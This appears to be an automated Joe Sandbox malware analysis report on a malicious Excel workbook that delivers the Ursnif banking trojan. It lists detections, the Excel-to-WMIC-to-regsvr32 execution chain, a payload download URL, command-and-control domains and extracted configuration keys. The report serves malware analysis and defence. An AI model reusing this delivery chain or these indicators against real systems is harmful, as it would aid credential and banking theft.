Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report inquiry[2021.09.23_12-51].xlsb

Overview

General Information

Sample Name:inquiry[2021.09.23_12-51].xlsb
Analysis ID:507191
MD5:d5dedf5221391bc183c80173ed5f4279
SHA1:bc48802d095a79a9fb8196d35506c4862c937936
SHA256:f2be1c567425b843b8deec064cd9f747d74f4ae5e15d026fcb5b26549ae3fba9
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Document exploit detected (drops PE files)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Sigma detected: Regsvr32 Anomaly
Writes or reads registry keys via WMI
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Drops PE files to the user root directory
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Contains functionality to create processes via WMI
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious WMI Execution
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Yara detected Xls With Macro 4.0
Registers a DLL
Drops PE files to the user directory
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1592 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 2032 cmdline: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll' MD5: FD902835DEAEF4091799287736F3A028)
  • regsvr32.exe (PID: 836 cmdline: regsvr32 -s C:\Users\Public\codec.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1836 cmdline: -s C:\Users\Public\codec.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "fvJh27FBcY4iDmo8nCK4tyEyXBN1k8EH6mQMtoi0dnoRhrc5m5vdusHgV3SXuoUGMa23szx8nbXoW/YvU6GtHhAvUSB3G4U1Ylw/Xh1SVuQ+LO6TJ5FDzvuvlg0YXcMX9mvaGnH4pn1OZPle0xacxTcEDOgypVqvi4iEgedhkhwkB6rnz9dTsvjARpuFSu5o8A6JPynuxJxchr9FkN/Fno9flLeQF+/qdSiPrlYIV9RsCbTSD+mr7xqZf1jQtWFzbzSlTV418QgPx2KC/w2jRtHZz8hTGrwmHwLbEbIJliSiQj5HSTV5xJYqQZZ7Zy9GbDv8RU+OXsPiONzK+XPKFqwVzJ1/d6Y0ElMnzCE6P84=", "c2_domain": ["apt.updateffboruse.com", "app.updatebrouser.com"], "botnet": "1500", "server": "580", "serpent_key": "H5PUPU7SQqXa0MEJ", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          Process Memory Space: regsvr32.exe PID: 1836JoeSecurity_UrsnifYara detected UrsnifJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.regsvr32.exe.6e2a0000.8.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              6.2.regsvr32.exe.2a59590.7.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                6.3.regsvr32.exe.1c8cbc.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  6.2.regsvr32.exe.1a0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    6.2.regsvr32.exe.2a59590.7.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Regsvr32 AnomalyShow sources
                      Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: -s C:\Users\Public\codec.dll, CommandLine: -s C:\Users\Public\codec.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\Public\codec.dll, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 836, ProcessCommandLine: -s C:\Users\Public\codec.dll, ProcessId: 1836
                      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll', CommandLine: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll', CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1592, ProcessCommandLine: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll', ProcessId: 2032
                      Sigma detected: Suspicious WMI ExecutionShow sources
                      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll', CommandLine: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll', CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1592, ProcessCommandLine: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll', ProcessId: 2032

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "fvJh27FBcY4iDmo8nCK4tyEyXBN1k8EH6mQMtoi0dnoRhrc5m5vdusHgV3SXuoUGMa23szx8nbXoW/YvU6GtHhAvUSB3G4U1Ylw/Xh1SVuQ+LO6TJ5FDzvuvlg0YXcMX9mvaGnH4pn1OZPle0xacxTcEDOgypVqvi4iEgedhkhwkB6rnz9dTsvjARpuFSu5o8A6JPynuxJxchr9FkN/Fno9flLeQF+/qdSiPrlYIV9RsCbTSD+mr7xqZf1jQtWFzbzSlTV418QgPx2KC/w2jRtHZz8hTGrwmHwLbEbIJliSiQj5HSTV5xJYqQZZ7Zy9GbDv8RU+OXsPiONzK+XPKFqwVzJ1/d6Y0ElMnzCE6P84=", "c2_domain": ["apt.updateffboruse.com", "app.updatebrouser.com"], "botnet": "1500", "server": "580", "serpent_key": "H5PUPU7SQqXa0MEJ", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: iqwasithealth.comVirustotal: Detection: 6%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cmsMetadefender: Detection: 37%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cmsReversingLabs: Detection: 67%
                      Source: C:\Users\Public\codec.dllMetadefender: Detection: 37%Perma Link
                      Source: C:\Users\Public\codec.dllReversingLabs: Detection: 67%
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,6_2_001A3FAB
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 50.87.248.41:443 -> 192.168.2.22:49165 version: TLS 1.2
                      Source: Binary string: c:\885\Thus\Drop\Occur\159_take\King.pdb source: regsvr32.exe, 00000006.00000002.674612184.000000006E2CE000.00000002.00020000.sdmp, a435gfhs109[1].cms.0.dr
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2C77FF FindFirstFileExA,6_2_6E2C77FF

                      Software Vulnerabilities:

                      barindex
                      Document exploit detected (drops PE files)Show sources
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: codec.dll.0.drJump to dropped file
                      Document exploit detected (creates forbidden files)Show sources
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\codec.dllJump to behavior
                      Document exploit detected (process start blacklist hit)Show sources
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
                      Document exploit detected (UrlDownloadToFile)Show sources
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                      Source: global trafficDNS query: name: iqwasithealth.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 50.87.248.41:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 50.87.248.41:443

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: app.updatebrouser.com
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: apt.updateffboruse.com
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/a435gfhs109.cms HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: iqwasithealth.comConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                      Source: regsvr32.exe, 00000006.00000002.673589094.0000000000518000.00000004.00000020.sdmpString found in binary or memory: http://apt.updateffboruse.com/_2BYjuB36DkhB1eXLxT/icgzR9URog3BC5Xw8V6nIs/1N91Pgd5TeSwG/3boxgKnH/mcET
                      Source: regsvr32.exe, 00000006.00000002.674022207.00000000021E0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: WMIC.exe, 00000003.00000002.415850120.0000000001B60000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.673734417.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673666693.0000000001CC0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: regsvr32.exe, 00000006.00000002.674022207.00000000021E0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: sharedStrings.binString found in binary or memory: https://iqwasithealth.com/wp-content/uploads/2019/06/a435gfhs109.cms
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE192CE4.pngJump to behavior
                      Source: unknownDNS traffic detected: queries for: iqwasithealth.com
                      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/a435gfhs109.cms HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: iqwasithealth.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 50.87.248.41:443 -> 192.168.2.22:49165 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,6_2_001A3FAB

                      System Summary:

                      barindex
                      Office process drops PE fileShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cmsJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\codec.dllJump to dropped file
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
                      Contains functionality to create processes via WMIShow sources
                      Source: WMIC.exe, 00000003.00000002.415756597.00000000002E4000.00000004.00000040.sdmpBinary or memory string: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'MAIN=EIVQSAOUS
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A22746_2_6E2A2274
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A7E306_2_001A7E30
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A26546_2_001A2654
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A4FA76_2_001A4FA7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2CC8416_2_6E2CC841
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A121F NtMapViewOfSection,6_2_6E2A121F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A1A1C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,6_2_6E2A1A1C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A2013 GetProcAddress,NtCreateSection,memset,6_2_6E2A2013
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A2495 NtQueryVirtualMemory,6_2_6E2A2495
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,6_2_001A22EC
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A8055 NtQueryVirtualMemory,6_2_001A8055
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms D5FE3F6846CA1F5E09E94D66A816C3FC00634013CA7BF9E35361BD185A27C395
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\codec.dll D5FE3F6846CA1F5E09E94D66A816C3FC00634013CA7BF9E35361BD185A27C395
                      Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                      Source: codec.dll.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: a435gfhs109[1].cms.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'
                      Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\Public\codec.dll
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\Public\codec.dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\Public\codec.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$inquiry[2021.09.23_12-51].xlsbJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDBFC.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@6/4@4/1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A4D62 SetWaitableTimer,CoCreateInstance,CoSetProxyBlanket,6_2_001A4D62
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A11B8 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,6_2_001A11B8
                      Source: inquiry[2021.09.23_12-51].xlsbJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: inquiry[2021.09.23_12-51].xlsbInitial sample: OLE zip file path = xl/media/image1.png
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: c:\885\Thus\Drop\Occur\159_take\King.pdb source: regsvr32.exe, 00000006.00000002.674612184.000000006E2CE000.00000002.00020000.sdmp, a435gfhs109[1].cms.0.dr
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A2210 push ecx; ret 6_2_6E2A2219
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A2263 push ecx; ret 6_2_6E2A2273
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A7E1F push ecx; ret 6_2_001A7E2F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A7AB0 push ecx; ret 6_2_001A7AB9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2AF61D push ecx; ret 6_2_6E2AF622
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2AFE10 push 8B419BFFh; retf 6_2_6E2AFE34
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B024A push esp; retf 6_2_6E2B024C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B4291 push dword ptr [eax+eax-41h]; ret 6_2_6E2B429F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B2B4A push ss; ret 6_2_6E2B2B56
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2AF748 push dword ptr [ebp+ebp*2-0Ch]; ret 6_2_6E2AF7CF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B0B47 push ebp; retf 6_2_6E2B0B49
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B535F push edx; ret 6_2_6E2B536D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2AF817 push dword ptr [ebp+ebp*2-0Ch]; ret 6_2_6E2AF7CF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B2869 push edi; retf 6_2_6E2B2876
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B2073 push esi; ret 6_2_6E2B209D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B209E push esi; ret 6_2_6E2B209D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2C3DE6 push ecx; ret 6_2_6E2C3DF9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2F9120 pushad ; iretd 6_2_6E2F914E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2FAF10 pushad ; ret 6_2_6E2FAF17
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2FA165 push cs; ret 6_2_6E2FA16D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2FAA50 push esp; iretd 6_2_6E2FAA51
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2FA0B9 push edi; iretd 6_2_6E2FA0BD
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A1552 LoadLibraryA,GetProcAddress,6_2_6E2A1552
                      Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\Public\codec.dll

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cmsJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cmsJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\codec.dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\codec.dllJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the user root directoryShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\codec.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
